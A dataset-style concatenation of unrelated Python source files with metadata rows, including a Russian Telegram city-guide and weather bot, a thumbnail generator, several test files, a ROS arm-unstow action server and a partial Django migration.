'автосервис': ['штрафстоянка', 'шиномонтаж', 'заправка', 'автомойка', 'авторемонт', 'стоянка', 'автохимия', 'шины, диски'],
'туризм': ['гостиница', 'хостел', 'отель', 'база отдыха', 'авиабилеты', 'железнодорожные билеты'],
'прогулка': ['парк', 'сквер', 'экскурсии', 'достопримечательность', 'отдых'],
}
reply_keyboard = [['Развлечения', 'Питание'],
['Спорт', 'Религия', 'Туризм'],
['Культура', 'Магазины'],
['Автосервис', 'Медтовары', 'Медицина'],
['Животные', 'Прогулка'],
['Погода'],
['Сменить город']]
inline_keyboard = InlineKeyboardMarkup([[InlineKeyboardButton('Следующее место', callback_data=1)]])
inline_keyboard_1 = InlineKeyboardMarkup([[InlineKeyboardButton('Следующий день', callback_data=2)]])
inline_keyboard_2 = InlineKeyboardMarkup([[InlineKeyboardButton('Следующий день', callback_data=2)],
[InlineKeyboardButton('Предыдущий день', callback_data=3)]])
location = {}
weather = {}
morph = pymorphy2.MorphAnalyzer()
def start(bot, update):
update.message.reply_text("Привет! :)\n"
"Я твой бот-помощник!\n")
update.message.reply_text("Я помогу тебе найти интересные места в городе на основе твоих интересов, а также узнать погоду.\n"
"Для этого напиши /guide\n"
"Для прекращения поиска набери /stop\n")
update.message.reply_text("Если захочешь узнать про пробки, то набери\n"
"/traffic_congestion {АДРЕС1}:{АДРЕС2}\n"
"или\n"
"/traffic_congestion {АДРЕС}\n")
def guide(bot, update):
update.message.reply_text("Какой город тебя интересует?")
return 1
def town(bot, update, user_data):
user_data['locality'] = update.message.text
_ans = search(user_data["locality"], 'кино')
if not _ans:
print('Ошибка при поиске города')
update.message.reply_text("Прости, но я не смог найти такой город.\nКакой город тебя интересует?")
return 1
markup = ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)
update.message.reply_text("Выберите сферу которая вас интересует", reply_markup=markup)
return 2
def stop(bot, update):
update.message.reply_text("Удачи!")
return ConversationHandler.END
def interests(bot, update, user_data):
global location
message = update.message.text.lower()
if message == 'сменить город':
return 1
elif message == 'погода':
_weather = get_weather(user_data['locality'])
gr = morph.parse('градус')[0]
degrise = str(_weather[0]['temp']) + ' ' + gr.make_agree_with_number(abs(int(_weather[0]['temp']))).word
degrise1 = str(_weather[0]['feels_like']) + ' ' + gr.make_agree_with_number(
abs(int(_weather[0]['feels_like']))).word
date = _weather[0]['date']
osh = _weather[0]['condition']
mes = "Погода на {}.\nТемпература {}(ощущается как {}), {}".format(date, degrise, degrise1, osh)
_1 = update.message.reply_text(mes, reply_markup=inline_keyboard_1)
weather[_1.message_id] = [_weather, 0]
return 2
elif message in places:
update.message.reply_text("Начинаю поиск...")
_1 = 8 # choice(range(3, len(places[message]+1)))
datas = []
_text = []
random_places = []
for _ in range(len(places[message]), 0, -1):
random_place = choice(places[message])
while True:
if random_place not in random_places:
break
random_place = choice(places[message])
result = search(user_data['locality'], random_place, _1)
# print('Результат поиска: ', result)
for _ in result:
data = _[0]
coord = _[1]
if data not in datas:
static_api_request = "http://static-maps.yandex.ru/1.x/?ll={}&l=map&z=15&pt={},pm2blywm1".format(
coord, coord)
# print('Информация прошла проверку: ', data)
_text.append('[Картинка.]({})\n{} ({})'.format(static_api_request, data, random_place))
datas.append(data)
markup = ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)
shuffle(_text)
_text = cycle(_text)
_return = update.message.reply_text(next(_text), reply_markup=inline_keyboard)
location[_return.message_id] = _text
update.message.reply_text("Выберите сферу которая вас интересует", reply_markup=markup)
return 2
else:
return 2
def change_places(bot, update):
global location
query = update.callback_query
if query.data == '1':
bot.edit_message_text(text=next(location[query.message.message_id]),
chat_id=query.message.chat_id,
message_id=query.message.message_id, parse_mode='markdown',
reply_markup=inline_keyboard)
elif query.data == '2':
weather[query.message.message_id][1] += 1
_key_board = inline_keyboard_2
if weather[query.message.message_id][1] >= len(weather[query.message.message_id][0]):
weather[query.message.message_id][1] = 0
_key_board = inline_keyboard_1
_weather = weather[query.message.message_id][0]
index = weather[query.message.message_id][1]
gr = morph.parse('градус')[0]
degrise = str(_weather[index]['temp']) + ' ' + gr.make_agree_with_number(abs(int(_weather[index]['temp']))).word
degrise1 = str(_weather[index]['feels_like']) + ' ' + gr.make_agree_with_number(
abs(int(_weather[index]['feels_like']))).word
if len(_weather[index]['date'].split('-')) != 1:
date = _weather[index]['date'].split('-')[-1] + '.' + _weather[index]['date'].split('-')[-2]
else:
date = _weather[index]['date']
osh = _weather[index]['condition']
mes = "Погода на {}.\nТемпература {} (ощущается как {}), {}".format(date, degrise, degrise1, osh)
bot.edit_message_text(text=mes,
chat_id=query.message.chat_id,
message_id=query.message.message_id, parse_mode='markdown',
reply_markup=_key_board)
elif query.data == '3':
weather[query.message.message_id][1] -= 1
_key_board = inline_keyboard_2
if weather[query.message.message_id][1] <= 0:
weather[query.message.message_id][1] = 0
_key_board = inline_keyboard_1
_weather = weather[query.message.message_id][0]
index = weather[query.message.message_id][1]
gr = morph.parse('градус')[0]
degrise = str(_weather[index]['temp']) + ' ' + gr.make_agree_with_number(abs(int(_weather[index]['temp']))).word
degrise1 = str(_weather[index]['feels_like']) + ' ' + gr.make_agree_with_number(
abs(int(_weather[index]['feels_like']))).word
if len(_weather[index]['date'].split('-')) != 1:
date = _weather[index]['date'].split('-')[-1] + '.' + _weather[index]['date'].split('-')[-2]
else:
date = _weather[index]['date']
osh = _weather[index]['condition']
mes = "Погода на {}.\nТемпература {}(ощущается как {}), {}".format(date, degrise, degrise1, osh)
bot.edit_message_text(text=mes,
chat_id=query.message.chat_id,
message_id=query.message.message_id, parse_mode='markdown',
reply_markup=_key_board)
return 2
def traffic_congestion(bot, update, args):
if args!=[]:
if [True for j in args if ':' in j]:
address = (''.join(args)).split(':')
address1, address2 = address[0], address[1]
try:
lat, lon = get_coordinates(address2)
ll, spn = get_ll_span(address1, [str(lat) + ',' + str(lon)], [address2])
except:
update.message.reply_text("Извини, но я не смог найти этот адрес :(")
elif len(args)>=1:
address1 = args
try:
ll, spn = get_ll_span(address1, [], [])
except:
update.message.reply_text("Извини, но я не смог найти этот адрес :(")
static_api_request = "http://static-maps.yandex.ru/1.x/?ll={}&l=map,trf&spn={}".format(ll, spn)
bot.sendPhoto(
update.message.chat.id,
static_api_request
)
else:
update.message.reply_text("Нет адреса")
def main():
updater = Updater(TOKEN)
dp = updater.dispatcher
conv_handler = ConversationHandler(
entry_points=[CommandHandler('guide', guide)],
states={
1: [MessageHandler(Filters.text, town, pass_user_data=True)],
2: [MessageHandler(Filters.text, interests, pass_user_data=True),
CallbackQueryHandler(change_places)],
},
fallbacks=[CommandHandler('stop', stop)]
)
dp.add_handler(conv_handler)
dp.add_handler(CommandHandler('start', start))
dp.add_handler(CommandHandler('traffic_congestion', traffic_congestion, pass_args=True))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
| 39.885185 | 139 | 0.594391 | 1,170 | 10,769 | 5.276923 | 0.270085 | 0.029155 | 0.046161 | 0.05102 | 0.427276 | 0.391642 | 0.364917 | 0.343537 | 0.319242 | 0.312763 | 0 | 0.011732 | 0.263906 | 10,769 | 269 | 140 | 40.033457 | 0.767125 | 0.011143 | 0 | 0.325123 | 0 | 0.009852 | 0.196148 | 0.003946 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039409 | false | 0.014778 | 0.039409 | 0 | 0.123153 | 0.004926 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8562b359ddfac56302ad4265ef21d77fb3b401 | 4,804 | py | Python | make_thumbnails.py | ceesem/text_image_thumbnails | 79d6739861547b26d6c845d3d9f2c27c5709a5e6 | [
"MIT"
] | null | null | null | make_thumbnails.py | ceesem/text_image_thumbnails | 79d6739861547b26d6c845d3d9f2c27c5709a5e6 | [
"MIT"
] | null | null | null | make_thumbnails.py | ceesem/text_image_thumbnails | 79d6739861547b26d6c845d3d9f2c27c5709a5e6 | [
"MIT"
] | null | null | null | from src.thumbnail_maker import thumbnail_image, simple_filename, make_author_string
import pandas as pd
import click
import datetime
import os
import tqdm
import re
import time
from multiwrapper import multiprocessing_utils as mu
TITLE_COLUMN = "title"
ABSTRACT_COLUMN = "abstract"
AUTHOR_COLUMN_CONTAINS = "author"
TWITTER_COLUMN_CONTAINS = "twitter"
THUMBNAIL_DIRECTORY = "thumbnail_images"
MIN_HEIGHT = 570
WIDTH = 1000
@click.command()
@click.option("--filename", "-f")
@click.option("--batch_name", "-b", default=None)
@click.option("--min_height", "-h", default=MIN_HEIGHT)
@click.option("--width", "-w", default=WIDTH)
@click.option("--title_column", "-T", default=TITLE_COLUMN)
@click.option("--abstract_column", "-A", default=ABSTRACT_COLUMN)
@click.option("--author_column_contains", "-au", default=AUTHOR_COLUMN_CONTAINS)
@click.option("--twitter_column_contains", "-tw", default=TWITTER_COLUMN_CONTAINS)
@click.option("--save_author_string", "-s", default=True)
@click.option("--thumbnail_directory", "-d", default=THUMBNAIL_DIRECTORY)
@click.option("--use_oxford", "-ox", default=False)
@click.option("--n_threads", "-n", default=2)
def generate_thumbnails(
filename,
batch_name,
min_height,
width,
title_column,
abstract_column,
author_column_contains,
twitter_column_contains,
save_author_string,
thumbnail_directory,
use_oxford,
n_threads,
):
data = pd.read_csv(filename)
author_columns = []
for c in data.columns:
if re.match(author_column_contains, c) is not None:
author_columns.append(c)
twitter_columns = []
if twitter_column_contains is not False:
for c in data.columns:
if re.match(twitter_column_contains, c) is not None:
twitter_columns.append(c)
author_list = []
author_list_with_handles = []
for ii, row in data[author_columns].iterrows():
auths = row[~pd.isna(row)].tolist()
author_list.append(make_author_string(auths, use_oxford=use_oxford))
try:
twit_row = data.iloc[ii][twitter_columns]
handles = twit_row[~pd.isna(row).values].tolist()
author_list_with_handles.append(
make_author_string(auths, twitter_list=handles, use_oxford=use_oxford)
)
except:
print("Twitter handles failed!")
author_list_with_handles = author_list
title_list = data[title_column].tolist()
abstract_list = data[abstract_column].tolist()
if not os.path.exists(thumbnail_directory):
os.mkdir(thumbnail_directory)
if batch_name is None:
batch_dir = f"batch_{str(datetime.date.today()).replace('-', '_')}"
else:
batch_dir = batch_name
if not os.path.exists(f"{thumbnail_directory}/{batch_dir}"):
os.mkdir(f"{thumbnail_directory}/{batch_dir}")
if n_threads > 1:
print(f"Making all images with {n_threads} processes...")
all_args = []
t0 = time.time()
for title, authors, abstract in zip(title_list, author_list, abstract_list):
all_args.append(
[
title,
authors,
abstract,
width,
min_height,
thumbnail_directory,
batch_dir,
]
)
mu.multiprocess_func(_save_data_multithreaded, all_args, n_threads=n_threads)
print(f"\tImages produced in {time.time()-t0:.2f} s.")
else:
for title, authors, abstract in tqdm.tqdm(
zip(title_list, author_list, abstract_list), total=len(title_list)
):
img = thumbnail_image(
title, authors, abstract, image_width=width, min_height=min_height
)
fname = simple_filename(
title, f"{thumbnail_directory}/{batch_dir}", max_words=8
)
img.save(
fname, dpi=(150, 150),
)
if save_author_string:
data["authors_with_handles"] = author_list_with_handles
pure_filename = os.path.split(filename)[-1]
fn = pure_filename.split(".")
out_name = f"{thumbnail_directory}/{batch_dir}/{fn[-2].replace('/','')}_with_tweets.csv"
data.to_csv(out_name)
print(f"Data saved to {out_name}")
return
def _save_data_multithreaded(data):
title, authors, abstract, width, min_height, thumbnail_directory, batch_dir = data
img = thumbnail_image(
title, authors, abstract, image_width=width, min_height=min_height
)
fname = simple_filename(title, f"{thumbnail_directory}/{batch_dir}", max_words=8)
img.save(
fname, dpi=(150, 150),
)
if __name__ == "__main__":
generate_thumbnails()
| 33.361111 | 96 | 0.640716 | 582 | 4,804 | 4.994845 | 0.228522 | 0.080495 | 0.055384 | 0.062608 | 0.27967 | 0.204334 | 0.187823 | 0.164431 | 0.146543 | 0.146543 | 0 | 0.007675 | 0.240633 | 4,804 | 143 | 97 | 33.594406 | 0.7892 | 0 | 0 | 0.15748 | 0 | 0 | 0.141341 | 0.067027 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015748 | false | 0 | 0.070866 | 0 | 0.094488 | 0.031496 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e863cabfcc78adbadb9b8afecff13f3686d8348 | 681 | py | Python | regcore/tests/index_tests.py | cfpb/regulations-core | bb73956ab10d175fa19051573e3a279956c36bf9 | [
"CC0-1.0"
] | 8 | 2015-04-22T17:48:22.000Z | 2019-08-17T06:14:23.000Z | regcore/tests/index_tests.py | DalavanCloud/regulations-core | bb73956ab10d175fa19051573e3a279956c36bf9 | [
"CC0-1.0"
] | 27 | 2015-06-02T15:40:23.000Z | 2018-07-31T14:50:57.000Z | regcore/tests/index_tests.py | DalavanCloud/regulations-core | bb73956ab10d175fa19051573e3a279956c36bf9 | [
"CC0-1.0"
] | 39 | 2015-01-26T16:24:40.000Z | 2021-02-20T10:51:13.000Z | from regcore.index import *
from mock import patch
from pyelasticsearch.exceptions import IndexAlreadyExistsError
from unittest import TestCase
class IndexTest(TestCase):
@patch('regcore.index.ElasticSearch')
def test_init_schema(self, es):
init_schema()
self.assertTrue(es.called)
self.assertTrue(es.return_value.create_index.called)
self.assertTrue(es.return_value.put_mapping.called)
@patch('regcore.index.ElasticSearch')
def test_init_schema_index_exists(self, es):
es.return_value.create_index.side_effect = IndexAlreadyExistsError()
init_schema()
self.assertTrue(es.return_value.put_mapping.called)
| 32.428571 | 76 | 0.748899 | 82 | 681 | 6.012195 | 0.365854 | 0.081136 | 0.129817 | 0.133874 | 0.588235 | 0.444219 | 0.365112 | 0.365112 | 0 | 0 | 0 | 0 | 0.162996 | 681 | 20 | 77 | 34.05 | 0.864912 | 0 | 0 | 0.375 | 0 | 0 | 0.079295 | 0.079295 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e886667e495d30bf864d224193f954c5d8267bd | 1,145 | py | Python | returns/pointfree/cond.py | thecoblack/returns | ad76d4c5282ce53213cad57dc550e5b4565e2b48 | [
"BSD-2-Clause"
] | null | null | null | returns/pointfree/cond.py | thecoblack/returns | ad76d4c5282ce53213cad57dc550e5b4565e2b48 | [
"BSD-2-Clause"
] | null | null | null | returns/pointfree/cond.py | thecoblack/returns | ad76d4c5282ce53213cad57dc550e5b4565e2b48 | [
"BSD-2-Clause"
] | null | null | null | from typing import Callable, Type, TypeVar
from returns.interfaces.specific.result import ResultLikeN
from returns.methods.cond import internal_cond
from returns.primitives.hkt import Kind2, Kinded, kinded
_ValueType = TypeVar('_ValueType')
_ErrorType = TypeVar('_ErrorType')
_ResultKind = TypeVar('_ResultKind', bound=ResultLikeN)
def cond(
container_type: Type[_ResultKind],
success_value: _ValueType,
error_value: _ErrorType,
) -> Kinded[Callable[[bool], Kind2[_ResultKind, _ValueType, _ErrorType]]]:
"""
Help us to reduce the boilerplate when choosing paths with ``ResultLikeN``.
.. code:: python
>>> from returns.pointfree import cond
>>> from returns.result import Failure, Result, Success
>>> assert cond(Result, 'success', 'failure')(True) == Success('success')
>>> assert cond(Result, 'success', 'failure')(False) == Failure('failure')
"""
@kinded
def factory(
is_success: bool,
) -> Kind2[_ResultKind, _ValueType, _ErrorType]:
return internal_cond(
container_type, is_success, success_value, error_value,
)
return factory
| 30.131579 | 80 | 0.69345 | 122 | 1,145 | 6.303279 | 0.393443 | 0.071521 | 0.039012 | 0.072822 | 0.192458 | 0.096229 | 0 | 0 | 0 | 0 | 0 | 0.003236 | 0.190393 | 1,145 | 37 | 81 | 30.945946 | 0.826321 | 0.303057 | 0 | 0 | 0 | 0 | 0.040736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0.05 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e88d2b6f941cc8b5054e654c852f3aeea9d95eb | 2,111 | py | Python | concat/tests/test_example_programs.py | jmanuel1/concat | b8a982f0b07c4af4a8d30c8fab927a07a4068232 | [
"MIT"
] | 5 | 2020-11-27T23:34:29.000Z | 2022-03-08T16:37:19.000Z | concat/tests/test_example_programs.py | jmanuel1/concat | b8a982f0b07c4af4a8d30c8fab927a07a4068232 | [
"MIT"
] | 1 | 2020-06-03T22:43:36.000Z | 2020-06-03T22:45:42.000Z | concat/tests/test_example_programs.py | jmanuel1/concat | b8a982f0b07c4af4a8d30c8fab927a07a4068232 | [
"MIT"
] | null | null | null | """
Example tests: make sure all examples work.
NOTE: This must be run from project root!
"""
from scripttest import TestFileEnvironment # type: ignore
import unittest
import os
import sys
import os.path
env = TestFileEnvironment('./test-output', cwd='.')
example_dir = './concat/examples'
examples = [
os.path.join(example_dir, x)
for x in os.listdir(example_dir)
if x.endswith('.cat')
]
class TestExamplePrograms(unittest.TestCase):
"""Test all the examples in concat/examples for correctness."""
def test_examples(self):
"""Test each example.
Ignored files must begin with '# IGNORE'.
Tested files each must start with '# IN: ' followed by the standard
input as a string literal, a newline, and '# OUT: ' followed by the
expected standard output.
"""
for name in examples:
with open(name) as spec, self.subTest(example=name):
inp = spec.readline()
# Ignore the file?
if inp.startswith('# IGNORE'):
continue
in_start, out_start = '# IN: ', '# OUT:'
if not inp.startswith(in_start):
raise Exception(
'No input specified for file {}'.format(name)
)
inp = eval(inp[len(in_start) :].strip())
out = spec.readline()
if not out.startswith(out_start):
raise Exception(
'No output specified for file {}'.format(name)
)
out = eval(out[len(out_start) :].strip())
# scripttest fails loudly if concat exits with a nonzero code
actual = env.run(
sys.executable,
'-m',
'coverage',
'run',
'-m',
'concat',
name,
stdin=inp.encode(),
expect_stderr=True,
)
self.assertEqual(actual.stdout, out)
| 31.507463 | 77 | 0.509237 | 218 | 2,111 | 4.880734 | 0.449541 | 0.028195 | 0.024436 | 0.039474 | 0.048872 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.392231 | 2,111 | 66 | 78 | 31.984848 | 0.829306 | 0.217906 | 0 | 0.093023 | 0 | 0 | 0.086164 | 0 | 0 | 0 | 0 | 0 | 0.023256 | 1 | 0.023256 | false | 0 | 0.116279 | 0 | 0.162791 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e893fcabfae32e0fe9170e0a077a7d484a9f030 | 3,988 | py | Python | ow_lander/scripts/unstow_action_server.py | nasa/ow_simulator | 662fea6bf83d82e1b0aac69d05c16dee77cd71a5 | [
"NASA-1.3"
] | 97 | 2020-08-10T08:43:14.000Z | 2022-03-21T21:14:15.000Z | ow_lander/scripts/unstow_action_server.py | AliMuhammadOfficial/ow_simulator | e0c96d74c1f3dea1451c90782172a10cfe183d94 | [
"NASA-1.3"
] | 153 | 2020-08-11T22:37:25.000Z | 2022-03-31T23:29:41.000Z | ow_lander/scripts/unstow_action_server.py | AliMuhammadOfficial/ow_simulator | e0c96d74c1f3dea1451c90782172a10cfe183d94 | [
"NASA-1.3"
] | 26 | 2020-08-06T17:07:03.000Z | 2022-03-16T01:04:01.000Z | #!/usr/bin/env python2
# The Notices and Disclaimers for Ocean Worlds Autonomy Testbed for Exploration
# Research and Simulation can be found in README.md in the root directory of
# this repository.
import rospy
import actionlib
import ow_lander.msg
import sys
import copy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from std_msgs.msg import String
from sensor_msgs.msg import JointState
from gazebo_msgs.msg import LinkStates
from moveit_commander.conversions import pose_to_list
import constants
import utils
from LanderInterface import MoveItInterface
from LanderInterface import LinkStateSubscriber
from trajectory_async_execution import TrajectoryAsyncExecuter
class UnstowActionServer(object):
def __init__(self,name):
self._action_name = name
self._server = actionlib.SimpleActionServer(self._action_name,
ow_lander.msg.UnstowAction,
execute_cb=self.on_unstow_action,
auto_start = False)
self._server.start()
# Action Feedback/Result
self._fdbk = ow_lander.msg.UnstowFeedback()
self._result = ow_lander.msg.UnstowResult()
self._current_link_state = LinkStateSubscriber()
self._interface = MoveItInterface()
self._timeout = 0.0
self.trajectory_async_executer = TrajectoryAsyncExecuter()
self.trajectory_async_executer.connect("arm_controller")
def _update_feedback(self):
self._ls = self._current_link_state._link_value
self._fdbk.current.x = self._ls.x
self._fdbk.current.y = self._ls.y
self._fdbk.current.z = self._ls.z
self._server.publish_feedback(self._fdbk)
def _update_motion(self):
print("Unstow arm activity started")
goal = self._interface.move_arm.get_current_pose().pose
goal = self._interface.move_arm.get_named_target_values("arm_unstowed")
plan = self._interface.move_arm.plan(goal)
if len(plan.joint_trajectory.points) < 1:
return
else:
n_points = len(plan.joint_trajectory.points)
start_time = plan.joint_trajectory.points[0].time_from_start
end_time = plan.joint_trajectory.points[n_points-1].time_from_start
self._timeout = end_time -start_time
return plan
def on_unstow_action(self,goal):
plan = self._update_motion()
if plan is None:
self._server.set_aborted(self._result)
return
success = False
self.trajectory_async_executer.execute(plan.joint_trajectory,
done_cb=None,
active_cb=None,
feedback_cb=self.trajectory_async_executer.stop_arm_if_fault)
# Record start time
start_time = rospy.get_time()
def now_from_start(start):
#return rospy.get_time() - start
return rospy.Duration(secs=rospy.get_time() - start)
while ((now_from_start(start_time) < self._timeout)):
self._update_feedback()
success = self.trajectory_async_executer.success() and self.trajectory_async_executer.wait()
if success:
self._result.final.x = self._fdbk.current.x
self._result.final.y = self._fdbk.current.y
self._result.final.z = self._fdbk.current.z
rospy.loginfo('%s: Succeeded' % self._action_name)
self._server.set_succeeded(self._result)
else:
rospy.loginfo('%s: Failed' % self._action_name)
self._server.set_aborted(self._result)
if __name__ == '__main__':
rospy.init_node('Unstow')
server = UnstowActionServer(rospy.get_name())
rospy.spin()
| 34.982456 | 108 | 0.634654 | 455 | 3,988 | 5.23956 | 0.316484 | 0.026846 | 0.047819 | 0.067953 | 0.146393 | 0.065017 | 0 | 0 | 0 | 0 | 0 | 0.002116 | 0.288867 | 3,988 | 113 | 109 | 35.292035 | 0.838505 | 0.065948 | 0 | 0.075 | 0 | 0 | 0.024207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.2125 | 0.0125 | 0.3375 | 0.0125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8c3823a0da2b955e12c77ee3d80d179d9de1fd | 9,558 | py | Python | ccdb/experiments/migrations/0001_initial.py | thermokarst/ccdb-api | 01d76d75ffaaa9949991cdc3ac43b9ae388ad2a6 | [
"MIT"
] | null | null | null | ccdb/experiments/migrations/0001_initial.py | thermokarst/ccdb-api | 01d76d75ffaaa9949991cdc3ac43b9ae388ad2a6 | [
"MIT"
] | 24 | 2017-01-09T12:51:13.000Z | 2018-04-30T17:40:27.000Z | ccdb/experiments/migrations/0001_initial.py | thermokarst/ccdb-api | 01d76d75ffaaa9949991cdc3ac43b9ae388ad2a6 | [
"MIT"
] | null | null | null | from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('misc', '0001_initial'),
('locations', '0001_initial'),
('collections_ccdb', '0001_initial'),
('species', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Experiment',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('name', models.CharField(max_length=150)),
('code', models.CharField(blank=True, max_length=10)),
('description', models.CharField(blank=True, max_length=255)),
('sort_order', models.IntegerField(blank=True, null=True)),
],
options={
'ordering': ['sort_order'],
},
),
migrations.CreateModel(
name='Flaw',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True)),
('description', models.CharField(blank=True, max_length=255)),
('sort_order', models.IntegerField(blank=True, null=True)),
],
options={
'ordering': ['sort_order'],
},
),
migrations.CreateModel(
name='ProtocolAttachment',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('protocol', models.FileField(upload_to='experiments/protocols/%Y/%m/%d')),
('experiment', models.ForeignKey(to='experiments.Experiment')),
],
),
migrations.AddField(
model_name='experiment',
name='flaw',
field=models.ForeignKey(to='experiments.Flaw', null=True, blank=True),
),
migrations.AlterUniqueTogether(
name='experiment',
unique_together=set([('name', 'code')]),
),
migrations.CreateModel(
name='TreatmentType',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('code', models.CharField(blank=True, max_length=25)),
('treatment_type', models.CharField(blank=True, max_length=50)),
('placement', models.CharField(blank=True, max_length=25)),
('description', models.CharField(blank=True, max_length=255)),
('sort_order', models.IntegerField(blank=True, null=True)),
('experiment', models.ForeignKey(to='experiments.Experiment', null=True, blank=True)),
],
options={
'ordering': ['sort_order'],
},
),
migrations.AlterUniqueTogether(
name='treatmenttype',
unique_together=set([('experiment', 'name')]),
),
migrations.CreateModel(
name='Treatment',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('sex', models.CharField(max_length=25)),
('container', models.ForeignKey(to='misc.Container', null=True, blank=True)),
('flaw', models.ForeignKey(to='experiments.Flaw', null=True, blank=True)),
('species', models.ForeignKey(to='species.Species')),
('study_location', models.ForeignKey(to='locations.StudyLocation')),
('treatment_type', models.ForeignKey(to='experiments.TreatmentType')),
],
),
migrations.AlterUniqueTogether(
name='treatment',
unique_together=set([('treatment_type', 'container', 'study_location',
'species', 'sex')]),
),
migrations.CreateModel(
name='TreatmentReplicate',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('setup_date', models.DateField(blank=True, null=True)),
('setup_time', models.TimeField(blank=True, null=True)),
('setup_sample_size', models.IntegerField(blank=True, null=True)),
('mass_g', models.FloatField(blank=True, null=True)),
('flaw', models.ForeignKey(to='experiments.Flaw', null=True, blank=True)),
('treatment', models.ForeignKey(to='experiments.Treatment')),
],
),
migrations.AlterUniqueTogether(
name='treatmentreplicate',
unique_together=set([('treatment', 'name', 'setup_date', 'setup_time')]),
),
migrations.CreateModel(
name='AliveDeadCount',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('status_date', models.DateField()),
('status_time', models.TimeField(blank=True, null=True)),
('count_alive', models.IntegerField(blank=True, null=True)),
('count_dead', models.IntegerField(blank=True, null=True)),
('flaw', models.ForeignKey(to='experiments.Flaw', null=True, blank=True)),
('treatment_replicate', models.ForeignKey(to='experiments.TreatmentReplicate')),
],
),
migrations.AlterUniqueTogether(
name='alivedeadcount',
unique_together=set([('treatment_replicate', 'status_date', 'status_time',
'count_alive', 'count_dead')]),
),
migrations.AddField(
model_name='experiment',
name='collections',
field=models.ManyToManyField(to='collections_ccdb.Collection'),
),
migrations.AlterModelOptions(
name='alivedeadcount',
options={'verbose_name': 'Alive-dead Count'},
),
migrations.AddField(
model_name='treatmenttype',
name='display_name',
field=models.CharField(default='x', max_length=255, editable=False),
preserve_default=False,
),
migrations.AddField(
model_name='treatmentreplicate',
name='display_name',
field=models.CharField(default='x', max_length=255, editable=False),
preserve_default=False,
),
migrations.AddField(
model_name='treatment',
name='display_name',
field=models.CharField(default='x', max_length=255, editable=False),
preserve_default=False,
),
migrations.AlterField(
model_name='alivedeadcount',
name='flaw',
field=models.ForeignKey(related_name='alive_dead_counts', to='experiments.Flaw', null=True, blank=True),
),
migrations.AlterField(
model_name='alivedeadcount',
name='treatment_replicate',
field=models.ForeignKey(related_name='alive_dead_counts', to='experiments.TreatmentReplicate'),
),
migrations.AlterField(
model_name='experiment',
name='flaw',
field=models.ForeignKey(related_name='experiments', to='experiments.Flaw', null=True, blank=True),
),
migrations.AlterField(
model_name='protocolattachment',
name='experiment',
field=models.ForeignKey(related_name='protocols', to='experiments.Experiment'),
),
migrations.AlterField(
model_name='treatment',
name='container',
field=models.ForeignKey(related_name='treatments', to='misc.Container', null=True, blank=True),
),
migrations.AlterField(
model_name='treatment',
name='flaw',
field=models.ForeignKey(related_name='treatments', to='experiments.Flaw', null=True, blank=True),
),
migrations.AlterField(
model_name='treatment',
name='species',
field=models.ForeignKey(related_name='treatments', to='species.Species'),
),
migrations.AlterField(
model_name='treatment',
name='study_location',
field=models.ForeignKey(related_name='treatments', to='locations.StudyLocation'),
),
migrations.AlterField(
model_name='treatment',
